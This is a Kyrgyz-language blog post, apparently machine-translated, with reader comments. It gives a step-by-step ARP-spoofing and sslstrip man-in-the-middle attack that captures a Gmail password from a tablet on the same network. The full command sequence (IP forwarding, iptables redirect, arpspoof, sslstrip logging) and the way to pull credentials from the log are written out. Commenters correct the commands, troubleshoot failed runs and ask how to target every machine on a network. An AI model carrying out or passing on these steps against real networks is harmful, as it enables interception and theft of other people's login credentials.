ArpSpoofing жана SSlstrip аракетте.

Салам Блоггерлер.

Бүгүнкү күндө ар бир тармакка туташуу канчалык кооптуу экендиги жөнүндө кичинекей үлгүм бар, алардын көпчүлүгү бизге жаккан адамдардын коопсуздугусуз.

Бүгүнкү күндө мен Gmail сырсөзүн алуу үчүн Sslstrip менен ArpSpoofing колдоном. Айлана чөйрөнү көзөмөлдөө үчүн, мен "деген аккаунт түздүмtestarp@gmail.com«.

Ал эми преамбулалар мага анча жакпагандыктан, ишибизге киришели.

Төмөнкү маалымат менен эмне кыла алышкандыгы үчүн мен эч качан жооп бербейм. Мен муну билим берүү максатында гана жасайм

ENVIRONMENT

Бул тест үчүн бизде төмөнкүлөр бар:

1. Чабуулчу: Бул Debian Wheezy бар менин рабочий же стол компьютерим. Репозиторийлерден сиз орното аласыз sslstrip y dsniff ээ болуу arpspoofing

2. Жабырлануучу: Жабырлануучу - Android Tablet, анын почтасын браузер аркылуу гана көргүсү келет.

3. Орточо: Ортосу меники Cisco DPC2425 роутери

ДАРЕКТЕР.

Чабуулчунун дареги: 172.26.0.2

Багыттоочу дарек: 172.26.0.1

Жабырлануучунун дареги: 172.26.0.8

ЧАБУУЛ:

Кол салуунун кандайча иштээрин дагы бир аз түшүнүү үчүн, менин эскилериме барсаңыз болот POST

Бул чабуул үчүн жасай турган биринчи ишибиз - алдыга жылдырууну активдештирип, компьютерибиз маалыматты жабырлануучуга байкабай жөнөтүшү мүмкүн. (Болбосо бул кызматка кол салууну четке кагуу болот)

Ал үчүн биз төмөнкүлөрдү колдонобуз:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Түз консоль терезесиндеги ар бир буйрук.

Эми линуксадан tail -f кылсак, анда биз маалыматты түз жана түз көрөбүз

 

snapshot1

 

Анда каалаган нерсебизди кантип алабыз?

Алгач Планшетке каттарыбызды киргизели. Кирүү учурунда биздин консолубузда миңдеген жана миңдеген нерселер пайда болгонун көрөбүз.

Бүткөндөн кийин, биз "desdelinux" файлын нано менен ачабыз

nano desdelinux

Control + W менен SECURE POST деп аталган нерсени издейбиз.

Биз буга окшогон нерсени көрөбүз.

 

snapshot2

 

Көрүнбөй турган ошол чоң сызыктын арасында жабырлануучунун электрондук почтасы жана сыр сөзү бар.

Ошентип, акыры туннелдин аягындагы жарыкты көргөнгө чейин оң тарапка чуркайбыз.

 

snapshot3

 

Дагы бир жолу, бул кол салуудан кантип өзүбүздү бир аз коргой аларыбызды көрөбүз.

Урматтоо менен


Макаланын мазмуну биздин принциптерге карманат редакциялык этика. Ката жөнүндө кабарлоо үчүн чыкылдатыңыз бул жерде.

27 комментарий, өзүңүздүкүн калтырыңыз

Комментарий калтырыңыз

Сиздин электрондук почта дареги жарыяланбайт. Милдеттүү талаалар менен белгиленет *

*

*

  1. Маалыматтар үчүн жооптуу: Мигель Анхель Гатан
  2. Маалыматтын максаты: СПАМды көзөмөлдөө, комментарийлерди башкаруу.
  3. Мыйзамдуулук: Сиздин макулдугуңуз
  4. Маалыматтарды берүү: Маалыматтар үчүнчү жактарга юридикалык милдеттенмелерден тышкары билдирилбейт.
  5. Маалыматтарды сактоо: Occentus Networks (ЕС) тарабынан уюштурулган маалыматтар базасы
  6. Укуктар: Каалаган убакта маалыматыңызды чектеп, калыбына келтирип жана жок кыла аласыз.

  1.   @Jlcmux ал мындай деди:

    Учурдан пайдаланып билдирүү жарыяланганда, буйруктар туура эмес болгонун айткым келет.

    Аягында iptables буйругу башка сапта турган 8080 жок болуп жатат. Андан кийин arpspoof буйруктарынын бардыгы бир сапта болчу. Ар бир буйрук башка сапта турат.

    Редактор аны көрүп, оңдой алат деп үмүттөнөм.

    Салам.

    1.    Мануэль де ла Фуэнте ал мындай деди:

      Сиз айткан оңдоолорду киргиздим, макулбу?

      Эгер сиз артыкчылыктуу жазууга код киргизе турган болсоңуз, анда HTML көрүнүшүн колдонуп, макаланын күтүлүп жатканына жөнөтүүдөн мурун анын туура экендигин текшериңиз. Рахмат сага.

  2.   Luis ал мындай деди:

    Билими жокторубуз ушунчалык аялуу экенибизди билүү бизди суутту. Абдан жакшы маалымат, мен анча-мынча нерселерди түшүнбөсөм дагы, анын маанилүүлүгүн түшүнөм. Рахмат сага!
    Урматтоо менен

  3.   Жискард ал мындай деди:

    Бирок бул кол салган адам менен жабырлануучу бир тармакта болсо гана иштейт. Кандай болгон күндө дагы, эгерде сиз (бир тармакта болсоңуз) HTTPS аркылуу туташсаңыз, ал болбой калат, анткени сиздин компьютерден кетерден мурун маалыматтар шифрленген. Эгер сиз HTTP аркылуу туташсаңыз (Sсиз), тармактык кабелди карап туруп деле ачкычтар көрүнөт деп ойлойм.

    1.    @Jlcmux ал мындай деди:

      Бул туура эмес. Мен gmail сыр сөзүн бузуп жатам, эгер байкасаңыз, gmail https колдонот. Ошентип? Кеп https коопсуз болгону менен, ал httpден көз каранды. Демек, анчалык деле коопсуз эмес.

      Https жөнүндө ушунчалык көп моюнга албаңыз, ал S супермен үчүн эмес, ал "коопсуз" үчүн

    2.    RTen ал мындай деди:

      ал HTTPS менен же жок иштейт, мен аны Linux адистештирилген дистри менен сынап көрдүм жана ал көйгөйсүз иштейт

    3.    Мануэль де ла Фуэнте ал мындай деди:

      Сиз аны Wi-Fi уурдагандарга сабак берүү үчүн так колдонсоңуз болот. 😀

      Бул алардын Чема Алонсонун блогундагы көптөн бери айткандарына окшош:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Районант ал мындай деди:

        Остия, кандай сонун! / Анан алар VPN колдонгон сайын менин параноидиме айтышат, алар банктык эсепти текшерүүгө барганда ...). Баса, сиз комментарийлерде канчалык каардуу адамдарды көрүшүңүз керек ... эгерде акыры уурдап алса ...

        1.    eliotime3000 ал мындай деди:

          Эми биз өз VPN кызматын түзүү жана сунуштоо боюнча окуу куралыбызды алышыбыз керек.

      2.    Даниел ал мындай деди:

        Сиз шилтеме берген окуя абдан кызыктуу, ал тургай, роман китебине татыктуудай сезилет жана бул менин кошуналарымдын интернетин колдонуп жүргөнүмдү эсиме салат жана мен бул теманы жакшы билем десем дагы, мен коркунучтун чыныгы өлчөмдөрүн эч качан көрө алган жокмун деп ойлойм акырында, менин бактыма жараша, алар WPA2ге паролду гана өзгөртүштү жана менин провайдер менен болгон окуям ушул жерден башталды хаха

    4.    Жахабанын Күбөсү ал мындай деди:

      Ошондуктан аталышта Sslstrip иш жүзүндө деп жазылган.

      Ал чабуулчу ортодо турганда гана иштейт

  4.   дароо ал мындай деди:

    Сиз призмада кандай толкун менен иштейсиз? -.-
    жок.
    Сураныч XD жөнөтүү үчүн эмне күтүп жатасыз
    Урматтоо менен
    жакшы билдирүү

  5.   AurosZx ал мындай деди:

    Кызыктуусу, кийинчерээк билим берүү тестин жасайм ... Балким, WiFiга паролду алып салып, бир аз көңүл ачсам да болмок 😛
    Кандайдыр бир мүмкүнчүлүк менен, сиз сураган максаттуу баракчаларга ар кандай баракчаларды жөнөтүү үчүн ушул сыяктуу бир нерсе жасай аласызбы? Мисалы, алар Facebook ачууну каалашат, мен аларды Google'га багыттаймбы? 😛

    1.    @Jlcmux ал мындай деди:

      Ооба. Бирок мунун бардыгы такыр башка түрмөк.

      Балким кийинчерээк жайгаштырам.

  6.   акыркы жаңылык ал мындай деди:

    абдан жакшы пост, бул темалар абдан билимдүү, эми биз бул чабуулга туруштук бере алышыбыз керек, анткени айрымдар (мага окшоп) коомдук тармактарга туташышат (мисалы, университет) андан алыс болгонубуз оң.

    Силерге тынчтык болсун!

  7.   жөн гана башка-dl-колдонуучу ал мындай деди:

    Бул мен үчүн иштеген жок 🙁

  8.   woqer ал мындай деди:

    Https байланыштары сервердин тастыктамасы аркылуу шифрленгендигин эске албаганда, бир нерсе мага ийгиликсиз болду (сертификат сиздин компьютерде болгондо, браузериңиз шифрлөөгө жооп берет) iptables менен 80 эмес, 443 (http) портту багыттайсыз бул https

    1.    @Jlcmux ал мындай деди:

      Мен да ошону ойлогом. Кеп https "коопсуз" болгону менен, тилекке каршы, httpден көз каранды. Ошентип, sslstrip мунун артыкчылыгын колдонот, браузерде https грамоталарын колдонуп жатат деп ишендирет, бирок андай эмес.

      1.    woqer ал мындай деди:

        ыйык бок! бирок браузерде "бул сертификат шектүү сайттан же ушул сыяктуу нерседен келип жатат" деген сыяктуу эскертүүнү көрүшү керек ... Мен сөзсүз XD тесттерин жасашым керек болот

        1.    @Jlcmux ал мындай деди:

          Жок, таптакыр эч нерсе чыкпайт.

  9.   жөн гана башка-dl-колдонуучу ал мындай деди:

    Акыры мен үчүн иштеди
    Мен WEP тармагына пароль менен туташтым жана ал мага паролду түздөн-түз көрсөттү.

    Сурам. Бир эле жабырлануучунун ордуна, ушул эле процедураны, бирок тармакка туташкан бардык компьютерлер үчүн жасай аласызбы?

    1.    @Jlcmux ал мындай деди:

      Ооба сиз кыла аласыз. Бирок мен тажрыйба жасай элекмин. Өзүңүз байкап көрүңүз, өзүңүздүн ишиңиз жөнүндө айтып бериңиз.

  10.   Sinnick19 ал мындай деди:

    Бир гана нерсе, жабырлануучунун машинасы оффлайн режиминде иштейт, бирок sslstrip мага эч нерсе көрсөтпөйт: /

    1.    @Jlcmux ал мындай деди:

      Брандмауэрди бир саамга өчүрүшүңүз керек. Же болбосо, жок дегенде, келген байланыштарды иштетүү.

  11.   Mr black ал мындай деди:

    Проб экөөбүз facebook баракчасынын колдонуучунун атын жана паролун гана көрө алдык, gmailден журналдан эч кандай натыйжа тапкан жокмун, ошондой эле arpspoof «arpspoof -i -t« сабы гана керек болчу. Экинчи жагынан, жабырлануучу машина айрым барактарды ача алган жок. Мен иликтөөнү уланта берем, бул абдан кызыктуу. Манжаро колдонгондорго жардам, орнотуу үчүн пакеттер: dsniff (бул жерде arpspoff), twisted жана python2-pyopenssl. Sslstripти бул жерден жүктөөгө болот: http://www.thoughtcrime.org/software/sslstrip/
    Аны иштетүү үчүн $ python2 sslstrip.py
    Салам.

  12.   Mr black ал мындай деди:

    Бул чыккан жок, бирок arpspoof линиясы мындай: #arpspoof -i int -t ip-курман ip-роутер

  13.   Гилберт ал мындай деди:

    Карагыла, мен сен айткандай кылам:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Көйгөй, жабырлануучу, менин бөлмөмдө турган дагы бир компьютер, роутерди кайра иштетишим керек, эмне кылсам болот, жардам берсеңиз болот деген туташуусуз калып жатат.

    Дагы бир нерсе, мен виртуалдык машина менен иштеп жатам жана iwconfig командасын аткарганда wlan0 көрүнбөйт, ifconfig аткарганда дагы, эгер виртуалдык машинамда интернет бар болсо, анда eth0 интерфейси менен.